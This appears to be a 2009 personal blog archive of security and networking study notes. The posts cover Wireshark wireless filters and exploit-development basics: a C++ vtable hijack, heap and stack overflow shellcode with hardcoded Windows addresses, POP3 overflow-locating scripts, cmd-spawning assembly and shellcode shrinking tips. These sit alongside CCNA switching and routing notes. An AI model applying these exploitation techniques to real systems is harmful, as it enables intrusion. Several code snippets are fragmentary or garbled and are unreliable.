Wednesday, December 30, 2009

Wireless Sniffing with Wireshark

From the Chapter 6 of a book from Syngress:

-To display only traffic from the client station using the display field name, display filter to return only frames with our station MAC address as the source that are not destined to the broad-cast BSSID.

The display filter now becomes: eq 00:09:5b:e8:c4:03 and wlan.bssid ne ff:ff:ff:ff:ff:ff

-wlan.bssid eq 00:11:92:6e:cf:00

-We can apply a display filter to identify all packets that includes the SSID “NOWIRE” as shown:
wlan_mgt.tag.interpretation eq "NOWIRE"

-wlan_mgt.tag.interpretation eq "NOWIRE" and !(wlan.bssid eq 00:02:2d:37:4f:89 or wlan.bssid eq 00:40:05:df:93:c6 or wlan.bssid eq 00:40:96:36:80:f0)

-Even when there are no stations participating on the network, an AP will transmit at least ten packets a second to advertise the presence and capabilities of the network.

We can exclude these frames by applying a display filter as shown below:
!(wlan.fc.type eq 0 and wlan.fc.subtype eq 8)
wlan.fc.type eq 0 = management frame
wlan.fc.subtype eq 8 = beacon frame
wlan.fc.type eq 2 = data frame

-wlan.fc.protected ne 1 = ideatify all unencrypted frame

Since those management and beacon frames are always unencrypted, we can extend the display filter to identify unencrypted data frames only to get the most effective analysis:
wlan.fc.protected ne 1 and wlan.fc.type eq 2

-We can identify WEP traffic by identifying any frames that include the mandatory WEP Initialization Vector (IV):

-We can use a display filter to identify this header by filtering on the extended IV field:

-airdecap-ng utility (included in the open-source Aircrack-ng suite of tools) used to rewrite a packet capture that uses the TKIP protocol. Similar to Wireshark’s ability to decrypt WEP traffic, airdecap-ng requires you to have knowledge of either the PSK or the Pairwise Master Key (PMK) in order to decrypt TKIP traffic.

-For airdecap-ng, you can decrypt a TKIP packet capture using the same technique, by specifying the TKIP PMK with the -k parameter or by specifying the PSK with the -p parameter. When decrypting TKIP traffic, you must also specify the network SSID

-Airdecap-ng creates the output file wpapsk-dec.dump, which contains the unencrypted data frames.

airdecap-ng -l -p "dictionary" -e linksys wpask.dump eq 00:60:1d:1f:c5:18 and wlan.fc.type eq 2

-As a security feature, modern APs using WEP only support open authentication with WEP encryption, because shared key authentication introduces additional vulnerabilities to the network.

-To probe and get all SSID in Prefered Network List
C:\wireshark>tshark -r wireless-rwc-3.cap -nV | grep "SSID parameter set:" | sort | uniq
SSID parameter set: "hhonors"
SSID parameter set: "linksys"
SSID parameter set: "matrix"
SSID parameter set: "rogers"
SSID parameter set: "Rogers"
SSID parameter set: "turbonet"
SSID parameter set: "wldurel"
SSID parameter set: Broadcast

-A display filter to examine only traffic sent to the DS from wireless stations:
wlan.fc.tods eq 1 and wlan.fc.fromds eq 0

wlan.fc.tods eq 1 and wlan.fc.fromds eq 0 and eq 00:13:ce:55:98:ef and arp.opcode eq 1

-From main Wireshark window, we can use the display filter function to display only malformed frames with the following filter:

-frames that should only be transmitted by an AP (beacons, reassociation response, probe response)

-frames that should only be transmitted by stations (probe request, reassociation request,
association request).

Fuzzing suspection
eg. Individual frames include values that are not reasonable; frame 278 indicates the beacon interval is 42,281 millisecond (msec) (BI=42281), which means the AP is transmitting beacons once every 43.3 seconds, as opposed to the standard convention of 10 times per second. Similarly, frame 472 reports a beacon interval of 18,146, or one beacon every 18.1 seconds.

Tuesday, December 29, 2009

Socket programming RCE

My sample of a simple socket code which connected to, port 555555

#include "winsock2.h"
//#pragma comment(lib, "wininet.lib")

void main() {
// Initialize Winsock
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult != NO_ERROR)
printf("Error at WSAStartup()\n");

// Create a SOCKET for connecting to server
SOCKET ConnectSocket;
ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ConnectSocket == INVALID_SOCKET) {
printf("Error at socket(): %ld\n", WSAGetLastError());

// The sockaddr_in structure specifies the address family,
// IP address, and port of the server to be connected to.
sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr( "" );
clientService.sin_port = htons( 55555 );

// Connect to server.
if ( connect( ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR) {
printf( "Failed to connect.\n" );

printf("Connected to server.\n");

I debug the executable file in Ollydgb and monitor the connection with netcat. Connected! The IP and port number can see clearly in Ollydbg. During the process, 1 hardware breakpoint need to put. If i put in a normal software breakpoint, the program wont stop.

Monday, December 28, 2009

ntoh and hton

In socket programming, the 'htons' and 'ntohs' usually used for converting the IP port byte order. This can ensure the integer that represent correctly in different endian-ness of the machine.

On some machines, they basically do nothing such as IBM machine. On others, they
rearrange all the bytes ( swap bytes), eg Intel.

Little-endian architecture (eg,Intel) ==> swap bytes
Big-endian architecture (eg, IBM, Motorola) ==> output is same as input

htons() \\host to network short, converts a short from host byte order to network byte order

htonl() \\host to network long

ntohs() \\network to host short

ntohl() \\network to host long

We use 'hton' when we're about to send stuff over the wire, and 'ntoh' to convert the data on the wire into a form we can use. The end output that will travel on the wire is "Network Byte Oder" that represent by "Big Endian"

Exploiting C++ virtual function

Object | Vtable
Vtable pointer -----> Virtual function_1---> Virtual function1()

class Failwest
public :
char buf[200];
virtual void test(void)
cout<<"Class Vtable::test()"< }

Failwest overflow, *p;
void main(void)
char * p_vtable;
p_vtable= overflow.buf-4 ; // point to virtual table
strcpy(overflow.buf, shellcode)

Layout of the object

vtable pointer
fake virtual function pointer

Flow : vtable pointer ---> fake virtual function pointer ----> shellcode

Saturday, December 26, 2009

Heap Overflow

For Visual C++,use the release version to test the code

To prevent the application detect the debugger and use the debug management policy, we should add a command '_asm int 3' after the heap initialise. The application will stop after the heap create. Now, Attach the process to the debugger to test

To study heap.
1. heap_vis plugin for Ollydbg can be used to check the heap.
2. directly go to the heap location with Ctrl + G


To overflow the heap, put in flink to 0x44444444, blink to 0x00000000. the last distributing function work, exception run, because cannot write 0x44444444 to 0x00000000. If we change the target to legitimate address, 0x44444444 will write to the target.

When application exit, ExirProcess() will execute. It will trigger RtlEnterCriticalSection() and RtlLeaveCriticalSection() to syncronise thread.

RtlEnterCriticalSection() ---> 0x7FFDF020
RtlLeaveCriticalSection() ---> 0x7FFDF024

To prevent error, we need to repair the pointer of Rtl..(). (the PEB pointer)
0x7FFDf020 usually have a pointer to 0x77F8AA4C

Example of the shellcode

char shellcode[] =

//repair the pointer which shooted by heap overrun
"xB8\x20\xF0\xFD\x7F" // MOV EAX, 7FFDF020
"xBB\x4C\xAA\xF8\x77" //MOV EBX, 77F8AA4c the address need to verify with diff OS
"\x89\x18" //MOV DWORD PTR DS:[EAX],EBX

"the payload"
"\x16\x01\x1A\x00\x00\x00\x00\x00" //head of the adjacent free block
"\x88\x06\x52\x00\x20\xf0\xfd\x7f"; //0x00520688 is the add of shellcode in the heap block
//0x7ffdf020 is the add of RtlEnterCriticalSection()

Attention :
1.For heap overflow, usually we need to repair the heap environment
2.Testing in debuging and release mode is diff. Solution is the _asm int 3
3.To correctly verify the shellcode address, David Litchfield suggested use
these as jumping command. It can be found in netapi32.dll, user32.dl, rpcrt4.dll


Thursday, December 24, 2009

PE File Format

- VA = Image Base + RVA

Relation of File Offset and RVA

Section | RVA | File Offset

.text 0x00001000 0x0400
.rdata 0x00007000 0x6200
.data 0x00009000 0x7400
.rsrc 0x0002D000 0x7800

.text section offset = 0x1000-0x400 = 0xc00
.rdata section offset = 0x7000-0x6200 = 0xE00
.data section offset = 0x9000-0x7400 = 0x1c00
.rsrc section offset = 0x2D000-0x7800 = 0x25800

File offset = VA - Imagebase - section offset
= RVA - section offset

LordPE is a nice tool for PE analysis

Hex Editor : Ultra Edit, Hex Workshop, WinHex

Wednesday, December 23, 2009

Stack Overflow 2

For Visual C++ :

-stack overflow experiement, we should use the debug version. If we use the release version, we may need to retest again.

-heap overflow, we should use the release version. If we use the debug version, it will fail.If heap test is running directly under Ollydbg or Windbg, the heap management will use the debugging management policy.

ESP - Pointing to the top of the stack
EBP - Poining to the base of the top stack

_stdcall and _cdecl will be different. Be default, Visual C++ will use the _stdcall

call function
push ebp
mov ebp, esp
sub esp, xxx

add esp, xxx
pop ebp

Stack layout

Char buffer[0-3] Low addr
char buffer[4-7]
return address high addr

Example the input is 43214321432143214321

the memory layout at Ollydbg :

Char buffer[0-3] 1234 (Offset3,2,1,0)
char buffer[4-7] 1234
int..... 1234
ebp 1234
return address 1234

If the modified return adress is 0x00401122, we should input it in as 22 11 40 00 ( for little endian), so the end result EIP will show 0x00401122 correctly.

In Visual Studio 6.0, "Dependeny Walker" may obtain the user32.dll base address, MessageBoxA offset entry point and etc.

To obtain all the process various jumping address, Ollydbg plugin "OllyUni.dll" can be used. Put it in Ollydbg directory Plugins folder, restart Olly.

Right click on the code --> Overflow Return Address ---> ASCII Overflow returns --> Search JMP/ CALL ESP ---> >Click the L button on Olly tool bar or Log

- If the problem of different path length, heap spray method will be useful for this situation.

- The decoder for shellcode

ADD EAX,14h //the length of decoder is 20 bytes
XOR BL,44h //the encode key is 0x44
CMP BL,90h

During the start of decoder, EAX will be aimed on the start of shellcode. After the decoder, it will follow with the real shellcode. For this decoder, we need to add a bit of 0x90 as the shellcode ending.

Tips for make the shellcode "thinner"

- Some super useful asm command to make the shortest shellcode

xchg eax, reg //exchange eax with the register value
lodsd //the dword pointed by esi will put to eax, increase esi
lodsb //the byte pointed by esi will put into al, increase esi
cdq //use edx to extend eax to dword, if eax < 0x80000000,thi command can use as
mov edx, NULL

-use register such EBP, ESI,EDI or etc to store data, but not push into the stack
-the code can used as data
-protect the stack by raising the esp value at 1st, this can save a lot data initialising command

Wednesday, December 16, 2009

Stack and Integer Overflow

Stack Overflow

-Common address for XP, 2000 and 2003, JMP EBX address = 0x7ffa1571 0x7ffa4a1, JMP ESP = 0x7ffa4512

- Sometime after jmp esp, it cant follow the with the shellcode, eg in MS03-049 Workstation Service Overflow and MS03-026 RPC Overflow. Sometime they need the gap there. Maybe 8 bytes, so when testing, it shod be

jmp esp ---> testing code ( eg, eb fe ) ---> shellcode

Solution :
1. Place the shellcode in front at the return address


2. Add in some junk code in the gap

- To scan a host whether running the vulnerable application, we may scan it by analysis the network packet. Usually the patched will different with the unpatched version.

- To locate the overflow point, here the python code (for CMail) :

import poplib
m= poplib.POP3('')
s = 'a' * 100+'b' *100 + 'c'* 100 +'d'*100 +'e'* 100

import poplib
m= poplib.POP3('')
s = 'a' * 400+ 'a' * 10 +'b' * 10 + 'c' * 10 +'d' * 10 +'e' * 10+ 'f' * 10+'g' *

10+'h' * 10+'i' * 10+'j' * 10

- To open a command prompt

push ebp
mov ebp, esp
push ebx
mov byte ptr [ebp-4], 63h //'c'
mov byte ptr [ebp-3], 6Dh //'m'
mov byte ptr [ebp-2], 64h //'d'
mov byte ptr [ebp-1], 0 //'\0'

push 5 // #DEFINE SW_SHOW 5
lea eax, [ebp-4]
push eax
mov eax,0x777e4fd35
call eax
pop esp

void main()
char cmdline[4] = "cmd"
WinExec(cmdline, SW_SHOW);

Interger Overflow

- The input could be a -ve value. When this input asigned to a unsigned variable, it will change to 0xffffffff for -1. This could trigger overflow by assigning a huge heap area.

- Usually this type overflow hard to use than usual stack or heap overflow.

- Example : JPEG integer overflow, Windows USER32 LoadImage API integer overflow, PuTTY SFTP Client interger overflow, Evolution camel-lock-helper interger overflow

Thursday, December 3, 2009


For File Signature Verification, I noticed a tool in Windows that installed by default in several win32 platform, namely sigverif. To execute the tool, type 'sigverif' at the Run tab.

Sigverif able to scan the system folder to find the unsigned system files or driver files. The scanning path can be defined by ourself eg SYSTEM/Driver,etc.

Yet, the tool only able to inform us about the unsigned file, nothing else it able to do eg export to result to csv, or further investigate the file details.

Here the scanning result of my Windows VM :

Monday, November 30, 2009

Dionaea - Nepenthes successor

Nepenthes, the low interactive honeypot has implemented in the wild for several years. It is the versatile tool to collect malware, acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities.

Here come a next generation of the low interactive honeypot, Dionaea which is funded by Google Summer of Code 2009. It introduced several nice features to improve Nepenthes funtionality :

- embedding python as scripting language
- using libemu to detect shellcodes
- supporting ipv6 and tls

Full details about Dionaea can be found here.

And one interesting stuff that I just found out from the Nepenthesdev mailling list. Hugo González from the Mexican Chapter of the Honeynet created VirtualBox debian images which make it easier to install dionaea.

The image can be downloaded and import to virtualbox.

Monday, November 9, 2009

CCNA3 Chap 4-7 Note

Chapter 4 VTP

The switch can be configured in the role of a VTP server or a VTP client. VTP only learns about normal-range VLANs (VLAN IDs 1 to 1005). Extended-range VLANs (IDs greater than 1005) are not supported by VTP.

VTP stores VLAN configurations in the VLAN database called vlan.dat.

A router or Layer 3 switch defines the boundary of each domain.

VTP Modes- A switch can be configured in one of three modes: server, client, or transparent.

VTP clients function the same way as VTP servers, but you cannot create, change, or delete VLANs on a VTP client.

VTP Transparent-Transparent switches forward VTP advertisements to VTP clients and VTP servers. Transparent switches do not participate in VTP. VLANs that are created, renamed, or deleted on transparent switches are local to that switch only.

VTP Pruning-VTP pruning increases network available bandwidth by restricting flooded traffic to those trunk links that the traffic must use to reach the destination devices. Without VTP pruning, a switch floods broadcast, multicast, and unknown unicast traffic across all trunk links within a VTP domain even though receiving switches might discard them.

VTP server mode is the default mode for a cisco switch

A switch can be a member of only one VTP domain at a time. Until the VTP domain name is specified you cannot create or modify VLANs on a VTP server, and VLAN information is not propagated over the network.

a VTP frame is encapsulated as an 802.1Q frame

Each time a VLAN is added or removed, the configuration revision number is incremented.

Note: A VTP domain name change does not increment the revision number. Instead, it resets the revision number to zero.

Summary advertisements are sent:

Every 5 minutes by a VTP server or client to inform neighboring VTP-enabled switches of the current VTP configuration revision number for its VTP domain
Immediately after a configuration has been made

Request Advertisements

When a request advertisement is sent to a VTP server in the same VTP domain, the VTP server responds by sending a summary advertisement and then a subset advertisement.

Request advertisements are sent if:

-The VTP domain name has been changed
-The switch receives a summary advertisement with a higher configuration revision number than its own
-A subset advertisement message is missed for some reason
-The switch has been reset

Summary advertisements comprise the majority of VTP advertisement traffic.

You need to enable pruning on only one VTP server switch in the domain.

VTP server: Confirm that all of the switches you are going to configure have been set to their default settings.

As on the VTP server switch, confirm that the default settings are present.

Configure VTP client mode. Recall that the switch is not in VTP client mode by default. You have to configure this mode.


Chap 5 STP

Redundancy is the solution for achieving the necessary availability.

For broadcast frame,if there is more than one path for the frame to be forwarded out, it can result in an endless loop.

Network loops that are a result of accidental duplicate connections in the wiring closets are a common occurrence.

STP ensures that there is only one logical path between all destinations on the network by intentionally blocking redundant paths that could cause a loop.

If the path is ever needed to compensate for a network cable or switch failure, STP recalculates the paths and unblocks the necessary ports to allow the redundant path to become active.

The switch with the lowest BID automatically becomes the root bridge for the STA calculations.

the BID is made up of a priority value, an extended system ID, and the MAC address of the switch.

After a switch boots, it sends out BPDU frames containing the switch BID and the root ID every 2 seconds.

The root ID identifies the root bridge on the network. Initially, each switch identifies itself as the root bridge after bootup.

Although switch ports have a default port cost associated with them, the port cost is configurable.

spanning-tree cost value
spanning-tree cost 25

no spanning-tree cost //revert back

STP determines a root bridge for the spanning-tree instance by exchanging BPDUs.

This frame has a destination MAC address of 01:80:C2:00:00:00, which is a multicast address for the spanning-tree group.

When a switch first boots, the root ID is the same as the bridge ID. However, as the election process occurs, the lowest bridge ID replaces the local root ID to identify the root bridge switch

During BPDU process, root ID will change. But bridge ID wont change.

The default value for the priority of all Cisco switches is 32768. The priority range is between 1 and 65536; therefore, 1 is the highest priority.

When two switches are configured with the same priority and have the same extended system ID, the switch with the MAC address with the lowest hexadecimal value has the lower BID. Initially, all switches are configured with the same default priority value. The MAC address is then the deciding factor on which switch is going to become the root bridge.

The root port exists on non-root bridges and is the switch port with the best path to the root bridge. Root ports forward traffic toward the root bridge.

Only one root port is allowed per bridge.

For root bridges, all switch ports are designated ports. For non-root bridges, a designated port is the switch port that receives and forwards frames toward the root bridge as needed.

spanning-tree port-priority value

The port priority values range from 0 - 240, in increments of 16. The default port priority value is 128. As with bridge priority, lower port priority values give the port higher priority.

When two switches are connected to the same LAN segment, and root ports have already been defined, the two switches have to decide which port gets to be configured as a designated port and which one is left as the non-designated port

the switch with the lower BID has its port configured as a designated port, while the switch with the higher BID has its port configured as a non-designated port.

The port ID is appended to the port priority. For example, switch port F0/1 has a default port priority value of 128.1, where 128 is the configurable port priority value, and .1 is the port ID. Switch port F0/2 has a port priority value of 128.2, by default.

During a topology change, a port temporarily implements the listening and learning states for a specified period called the "forward delay interval."

switch diameter is the number of switches a frame has to traverse to travel from the two farthest points on the broadcast domain. A seven-switch diameter is the largest diameter that STP permits because of convergence times.

When a switch port configured with PortFast is configured as an access port, that port transitions from blocking to forwarding state immediately, bypassing the typical STP listening and learning states.

To understand the convergence process more thoroughly, it has been broken down into three distinct steps:

Step 1. Elect a root bridge

Step 2. Elect root ports

Step 3. Elect designated and non-designated ports

the show spanning-tree output for switch S1 reveals that it is the root bridge. You can see that the BID matches the root ID, confirming that S1 is the root bridge.

The max age delay of 20 seconds provides enough time for the seven-switch diameter with the 2-second hello timer between BPDU frame transmissions.

When a switch needs to signal a topology change, it starts to send TCNs on its root port. The TCN is a very simple BPDU that contains no information and is sent out at the hello time interval.

The receiving switch is called the designated bridge and it acknowledges the TCN by immediately sending back a normal BPDU with the topology change acknowledgement (TCA) bit set.

PVST+ a network can run an STP instance for each VLAN in the network. With PVST+, more than one trunk can block for a VLAN and load sharing can be implemented.

However, you can set the switch priority for the specified spanning-tree instance. This setting affects the likelihood that this switch is selected as the root switch. A lower value increases the probability that the switch is selected. The range is 0 to 61440 in increments of 4096. For example, a valid priority value is 4096x2 = 8192. All other values are rejected.

RSTP does not have a blocking port state. RSTP defines port states as discarding, learning, or forwarding.

RSTP speeds the recalculation of the spanning tree when the Layer 2 network topology changes.

Protocol information can be immediately aged on a port if hellos are not received for three consecutive hello times, 6 seconds by default, or if the max age timer expires.

An RSTP edge port is a switch port that is never intended to be connected to another switch device. It immediately transitions to the forwarding state when enabled.

Root ports, althernate and backup ports do not use the link type parameter. Designated ports make the most use of link

1 designed port per segment
1 root port per switch
1 root bridge per network

Althernate port
-present on non-designated switches and will make a transition to a designed port if the current designated path fails

Backup port
-redundant link to the segment

RSTP significantly speeds up the recalculation process after a topology change, because it converges on a link-by-link basis and does not rely on timers expiring before ports can transition. Rapid transition to the forwarding state can only be achieved on edge ports and point-to-point links.

Do not leave it up to the STP to decide which bridge is root.

STP Failure scenerio
Most spanning free algorithm failures occus due to excessive losses of BPDUs causing blocked ports to transition to forwarding mode. Broadcast sotrm occurring

BPDU guard disables a PortFast-configured port or interface if the

Using the original IEEE 802.1D spanning-tree protocol involves a convergence time of up to 50 seconds. RSTP reduces convergence time to approximately 6 seconds or less.port or interface receives a BPDU.

PVST - supprt ISL trunking and load balance
PVST+ -support RPDUguards
RSTP - incorporated into 802.1D; supports BackboneFast, Uplinkfast and PortFast
rapid PVST+ - based on IEEE802.1w


Chap 6 Inter-VLAN routing

"Router-on-a-stick" is a type of router configuration in which a single physical interface routes traffic between multiple VLANs on a network

Subinterfaces are multiple virtual interfaces, associated with one physical interface.

These subinterfaces are configured in software on a router that is independently configured with an IP address and VLAN assignment to operate on a specific VLAN.

Traditional routing requires routers to have multiple physical interfaces to facilitate inter-VLAN routing.

Functionally, the router-on-a-stick model for inter-VLAN routing is the same as using the traditional routing model, but instead of using the physical interfaces to perform the routing, subinterfaces of a single interface are used.

Subinterfaces require the switch port to be configured as a trunk port so that it can accept VLAN tagged traffic

To configure switch port F0/5 as a trunk port, execute the switchport mode trunk command in interface configuration mode on the F0/5 interface. You cannot use the switchport mode dynamic auto or switchport mode dynamic desirable commands because the router does not support dynamic trunking protocol.

1.verify vlan assigning in switch
2.verify switchport mode, (switch --> router must in trunk mode for subinterface to work)
3.wrong VLAN setting in router ( encapsulation bla bla)
4. ip adress and subnet mask

Each interface, or subinterface, needs to be assigned an IP address that corresponds to the subnet for which it is connected


Chap 7 Wireless

You should be aware that when a standard uses OFDM, it will have faster data rates.

The ITU-R regulates the allocation of the RF spectrum and satellite orbits.

The IEEE developed and maintains the standards for local and metropolitan area networks with the IEEE 802 LAN/MAN family of standards

The Wi-Fi Alliance is an association of vendors whose objective is to improve the interoperability of products that are based on the 802.11 standard by certifying vendors for conformance to industry norms and adherence to standards.

-ITU-R regulates allocation of RF bands.
-IEEE specifies how RF is modulated to carry information.
-Wi-Fi ensures that vendors make devices that are interoperable.

an access point converts the TCP/IP data packets from their 802.11 frame encapsulation format in the air to the 802.3 Ethernet frame format on the wired Ethernet network.

Imagine two client stations that both connect to the access point, but are at opposite sides of its reach. If they are at the maximum range to reach the access point, they will not be able to reach each other. This knowns as hidden nodes

One means of resolving the hidden node problem is a CSMA/CA feature called request to send/clear to send (RTS/CTS).

When RTS/CTS is enabled in a network, access points allocate the medium to the requesting station for as long as is required to complete the transmission.

The wireless network mode refers to the WLAN protocols: 802.11a, b, g, or n.

When a Linksys access point is configured to allow both 802.11b and 802.11g clients, it is operating in mixed mode.

A shared service set identifier (SSID) is a unique identifier that client devices use to distinguish between multiple wireless networks in the same vicinity. Several access points on a network can share an SSID

Beacons - Frames used by the WLAN network to advertise its presence. (advertised by access point)
Probes - Frames used by WLAN clients to find their networks.

The common distribution system allows multiple access points in an ESS to appear to be a single BSS.

The attacker, using a PC as an access point, can flood the BSS with clear-to-send (CTS) messages, which defeat the CSMA/CA function used by the stations. The access points, in turn, flood the BSS with simultaneous traffic, causing a constant stream of collisions.

This login process is managed by the Extensible Authentication Protocol (EAP). EAP is a framework for authenticating network access

SSID cloaking - Disable SSID broadcasts from access points
MAC address filtering - Tables are manually constructed on the access point to allow or disallow clients based on their physical hardware address
WLAN security implementation - WPA or WPA2

Various types of PSKs are as follows:

PSK or PSK2 with TKIP is the same as WPA
PSK or PSK2 with AES is the same as WPA2
PSK2, without an encryption method specified, is the same as WPA2

Multiple access points that share a service set identifier combine to form an extended service set.

wireless NIC - encodes a data stream onto a RF signal

Wednesday, November 4, 2009

CCNA3 Chap 1-3 Note

Chapter 1 LAN Design

In smaller networks, it is not unusual to implement a collapsed core model, where the distribution layer and core layer are combined into one layer.

Access layer switches can be configured with various port security options that provide control over which devices are allowed to connect to the network

Network diameter is the number of devices that a packet has to cross before it reaches its destination.

Link aggregation allows multiple switch port links to be combined so as to achieve higher throughput between switches.

Convergence is the process of combining voice and video communications on a data network.

User community analysis is the process of identifying various groupings of users and their impact on network performance.

Modular switches typically come with different sized chassis that allow for the installation of different numbers of modular line cards.

StackWise allows you to interconnect up to nine switches using fully redundant backplane connections.

Stackable switches are desirable where fault tolerance and bandwidth availability are critical and a modular switch is too costly to implement.

Forwarding rates define the processing capabilities of a switch by rating how much data the switch can process per second.

Link aggregation helps to reduce these bottlenecks of traffic by allowing up to eight switch ports to be bound together for data communications, providing up to 8 Gb/s of data throughput when Gigabit Ethernet ports are used.

Power over Ethernet (PoE) allows the switch to deliver power to a device over the existing Ethernet cabling.

Layer 3 switches are also known as multilayer switches.

PoE dramatically increases the overall price of the switch across all Cisco Catalyst switch product lines, so it should only be considered when voice convergence is required or wireless access points are being implemented, and power is difficult or expensive to run to the desired location.

Distribution layer switches are typically implemented in pairs to ensure availability. It is also recommended that distribution layer switches support multiple, hot swapable power supplies. Having more than one power supply allows the switch to continue operating even if one of the power supplies failed during operation


Chap 2 Basic switch


collision --> detect increase amplitude --> jamming signal --> backoff algorithm invoked -->stop transmitting for random time

An Ethernet MAC address is a two-part 48-bit binary value expressed as 12 hexadecimal digits. The address formats might be similar to 00-05-9A-3C-78-00,

auto - autonegotiation
full - full duplex
half - halp duplex

For Fast Ethernet and 10/100/1000 ports, the default is auto. For 100BASE-FX ports, the default is full.

Instead, you can now use the mdix auto interface configuration command in the CLI to enable the automatic medium-dependent interface crossover (auto-MDIX) feature.

For example, if a 12-port switch has a device connected to each port, 12 collision domains are created.

Since Layer 2 data is present earlier in the frame structure than the Layer 3 data, switches can process the frame more quickly.

Even though the LAN switch reduces the size of collision domains, all hosts connected to the switch are still in the same broadcast domain.

The use of higher layer devices can also increase latency on a network

Cut-through switching
Because the switch does not have to wait for the entire frame to be completely buffered, and because the switch does not perform any error checking, cut-through switching is faster than store-and-forward switching. switching
2.fragment-free switching
the switch stores the first 64 bytes of the frame before is a compromise between the high latency and high integrity of store-and-forward switching,

Asymmetric switching enables more bandwidth to be dedicated to a server switch port to prevent a bottleneck. - smoother network
-memory buffering

Routers are also capable of performing packet forwarding tasks not found on Layer 3 switches, such as establishing remote access connections to remote networks and devices.

AAA and TACACS are authentication protocols that can be used in networks to validate user credentials

You can change the aging time setting for MAC addresses. The default time is 300 seconds.

To create a static mapping in the MAC address table, use the mac-address-table static vlan {1-4096, ALL} interfaceinterface-id command.

If you want to remove the requirement to store all system passwords in an encrypted format, enter the no service password-encryption command from global configuration mode. Removing password encryption does not convert currently encrypted passwords back into readable text. However, all newly set passwords are stored in clear text format.

enable password recovery
-dir flash
-rename flash:config.text flash:config.text.old
-rename flash:config.text.old flash:config.text
-copy flash:config.text system:running-config
-configure terminal
-enable secret password
-copy running-config startup-config

The MOTD banner displays on all connected terminals at login and is useful for sending messages that affect all network users (such as impending system shutdowns). The MOTD banner displays before the login banner if it is configured.

To delete the RSA key pair, use the crypto key zeroize rsa global configuration command. After the RSA key pair is deleted, the SSH server is automatically disabled.

By default, up to five simultaneous, encrypted SSH connections for multiple CLI-based sessions over the network are available (session 0 to session 4).

the CLI-based session time-out value returns to the default of 10 minutes.

Specify the number of times that a client can re-authenticate to the server. The default is 3

//MAC flooding
MAC flooding can be performed using a network attack tool. The network intruder uses the attack tool to flood the switch with a large number of invalid source MAC addresses until the MAC address table fills up.

When the MAC address table is full, the switch floods all ports with incoming traffic because it cannot find the port number for a particular MAC address in the MAC address table. The switch, in essence, acts like a hub.

//DHCP starvation attack
causes all of the leases on the real DHCP server to be allocated, thus preventing the real users (DHCP clients) from obtaining an IP address.

to prevent DHCP attacks, use the DHCP snooping
Ports are identified as trusted and untrusted. Trusted ports can source all DHCP messages; untrusted ports can source requests only. Trusted ports host a DHCP server or can be an uplink toward the DHCP server. If a rogue device on an untrusted port attempts to send a DHCP response packet into the network, the port is shut down.

Static secure MAC addresses
Dynamic secure MAC addresses:
Sticky secure MAC addresses:

If you save the sticky secure MAC addresses in the configuration file, when the switch restarts or the interface shuts down, the interface does not need to relearn these addresses. If you do not save the sticky secure addresses, they are lost.

security violation modes
protect - drop packet, no notification
restrict - drop packet, got notification
shutdown - turn off port, default mode


Chap 3 - VLANs

A VLAN is a logically separate IP subnetwork. VLANs allow multiple IP networks and subnets to exist on the same switched network.

All switch ports become a member of the default VLAN after the initial boot up of the switch.

The Scavenger class is intended to provide less-than best-effort services to certain applications. . These include peer-to-peer media-sharing applications, gaming.

A dynamic port VLAN membership is configured using a special server called a VLAN Membership Policy Server (VMPS). With the VMPS, you assign switch ports to VLANs dynamically, based on the source MAC address of the device connected to the port.

The configuration command mls qos trust cos ensures that voice traffic is identified as priority traffic.

switchport voice VLAN 150

The default VLAN for Cisco switches is VLAN 1. VLAN 1 has all the features of any VLAN, except that you cannot rename it and you can not delete it.

It is a security best practice to change the default VLAN to a VLAN other than VLAN 1;

A native VLAN is assigned to an 802.1Q trunk port. An 802.1Q trunk port supports traffic coming from many VLANs (tagged traffic) as well as traffic that does not come from a VLAN (untagged traffic).

SVI is a logical interface configured for a specific VLAN. By default, an SVI is created for the default VLAN (VLAN 1) to permit remote switch administration.You need to configure an SVI for a VLAN if you want to route between VLANs

A trunk is a point-to-point link between one or more Ethernet switch interfaces and another networking device, such as a router or a switch

Dynamic Trunking Protocol (DTP) is a Cisco proprietary protocol

DTP manages trunk negotiation only if the port on the other switch is configured in a trunk mode that supports DTP.

Trunking modes
switchport mode trunk.
-Dynamic auto
switchport mode dynamic auto.
-Dynamic desirable
switchport mode dynamic desirable
-turn off DTP
switchport nonegotiate.

Note: Before deleting a VLAN, be sure to first reassign all member ports to a different VLAN. Any ports that are not moved to an active VLAN are unable to communicate with other stations after you delete the VLAN.

Alternatively, the entire vlan.dat file can be deleted using the command delete flash:vlan.dat from privileged EXEC mode. After the switch is reloaded, the previously configured VLANs will no longer be present.

Common problem with trunks
-native VLAN mistmatches
the native VLAN set wrong
-trunk mode mismatches
ex. dynamic auto + dynamic auto = access
-allowed vlans on trunks

VLANs are used to segment broadcast domains in a switched LAN. This improves the performance and manageability of LANs. VLANs provides network administrators flexible control over traffic associated with devices in the LAN.

Routers or Layer 3 switches are required for inter-VLAN communication

IEEE802.1Q is standard trunkng protocol. It does not tag native VLAN traffic,which can result in problems when trunking is misconfigured.

One IP subnet to one VLAN

Thursday, October 22, 2009

CCNA2 Cisco command

Router#erase startup-config
Router#debug ip routing
Router#debug ip rip
Router#undebug all

Router(config)# hostname R1
Router(config)# enable secret 1234password
Router(config)# banner motd &

!! Authorised ACCESS ONLY!

R1(config)#line console 0
R1(config-line)#password 123
R1(config-line)#logging synchronous
R1(config-line)#exec-timeout 0 0

R1(config)#line vty 4 0
R1(config-line)#password 123
R1(config-line)#logging synchronous
R1(config-line)#exec-timeout 0 0

//Disable domain lookup
R1(config)#no ip domain-lookup

//Clock rate set at DCE
Router(config)#interface serial 1/1
Router(config-if)#ip address
Router(config-if)#no ip address
Router(config-if)# clock rate 64000
Router(config-if)#no shutdown

//Static route need to set for both router
Router(config)#ip route

//Default route
Router(config)# ip route Next_Hop_Add
Router(config)# ip route serial 1/1
Router#show interface serial 1/1

Router(config)#router rip

//prevent the updates send to FE 0/0,save bandwidth
Router(config-router)#passive-interface fastethernet 0/0

//configure the router to include the static route with it RIP updates
Router(config-router)#default-information originate
Router #show ip protocols

Router#show running-config
Router#copy running-config startup-config
Router#show startup-config

Router# show interface
Router#show ip protocols
Router#show ip route
Router#show ip interfaces brief

Router(config)#cdp run
Router(config)#int ethernet 0/1
